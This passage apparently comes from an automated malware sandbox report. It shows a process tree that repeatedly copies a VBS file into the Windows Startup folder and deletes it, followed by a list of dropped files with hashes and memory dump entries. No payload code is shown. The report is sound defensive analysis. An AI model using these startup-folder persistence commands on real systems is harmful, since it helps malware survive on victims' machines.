                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                    4⤵
                                      PID:2236
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                      4⤵
                                        PID:1860
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                        4⤵
                                          PID:4948
                                        • C:\Windows\SYSTEM32\cmd.exe
                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                          4⤵
                                            PID:1580
                                          • C:\Windows\SYSTEM32\cmd.exe
                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                            4⤵
                                              PID:3152
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                              4⤵
                                                PID:1612
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                4⤵
                                                  PID:4428
                                                • C:\Windows\SYSTEM32\cmd.exe
                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                  4⤵
                                                    PID:4404
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                    4⤵
                                                      PID:1876
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                      4⤵
                                                        PID:872
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                        4⤵
                                                          PID:468
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                          4⤵
                                                            PID:4400
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                            4⤵
                                                              PID:836
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                              4⤵
                                                                PID:620
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                4⤵
                                                                  PID:4624
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                  4⤵
                                                                    PID:1568
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                    4⤵
                                                                      PID:3984
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                      4⤵
                                                                        PID:1008
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                        4⤵
                                                                          PID:2252
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                          4⤵
                                                                            PID:4808
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                            4⤵
                                                                              PID:4720
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                              4⤵
                                                                                PID:948
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                                4⤵
                                                                                  PID:4944
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                                  4⤵
                                                                                    PID:4644
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                                    4⤵
                                                                                      PID:2156
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                                      4⤵
                                                                                        PID:2476
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                                                                        4⤵
                                                                                          PID:4888
                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                                                                          4⤵
                                                                                            PID:2716

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                                      SHA1

                                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                      SHA256

                                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                      SHA512

                                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Filesize

                                                                                      944B

                                                                                      MD5

                                                                                      6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                      SHA1

                                                                                      c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                      SHA256

                                                                                      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                      SHA512

                                                                                      60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuqmtc2r.yua.ps1

                                                                                      Filesize

                                                                                      60B

                                                                                      MD5

                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                      SHA1

                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                      SHA256

                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                      SHA512

                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs

                                                                                      Filesize

                                                                                      550KB

                                                                                      MD5

                                                                                      f4c17c1f9588b303483c9179052b6ff4

                                                                                      SHA1

                                                                                      3b2a424c407a7908e6c697bb18e710dd3118d725

                                                                                      SHA256

                                                                                      06d4033beea299846b24d41f118f1f6469e0cd8a9a04818f1a618afe80a722a8

                                                                                      SHA512

                                                                                      2486f796f967527650f5b0883614d65506b73b4b7ee23db9d69278852562ccf90b7d916605871aa545c24960e7cc7ede58fbb1be2ae193e57a3141cc61db29b7

                                                                                    • C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\server.txt

                                                                                      Filesize

                                                                                      355B

                                                                                      MD5

                                                                                      daa58b938ebe73e880b2cdd8704c6301

                                                                                      SHA1

                                                                                      857c5eaf94dfeb56ba44ac70685c6787a846549c

                                                                                      SHA256

                                                                                      50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

                                                                                      SHA512

                                                                                      53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

                                                                                    • memory/1496-22-0x000001ECF3AF0000-0x000001ECF3AFA000-memory.dmp

                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/4348-0-0x00007FF8DA9F3000-0x00007FF8DA9F5000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/4348-1-0x0000023CF8CB0000-0x0000023CF8CD2000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/4348-11-0x00007FF8DA9F0000-0x00007FF8DB4B1000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB

                                                                                    • memory/4348-12-0x00007FF8DA9F0000-0x00007FF8DB4B1000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB

                                                                                    • memory/4348-49-0x00007FF8DA9F3000-0x00007FF8DA9F5000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/4348-50-0x00007FF8DA9F0000-0x00007FF8DB4B1000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB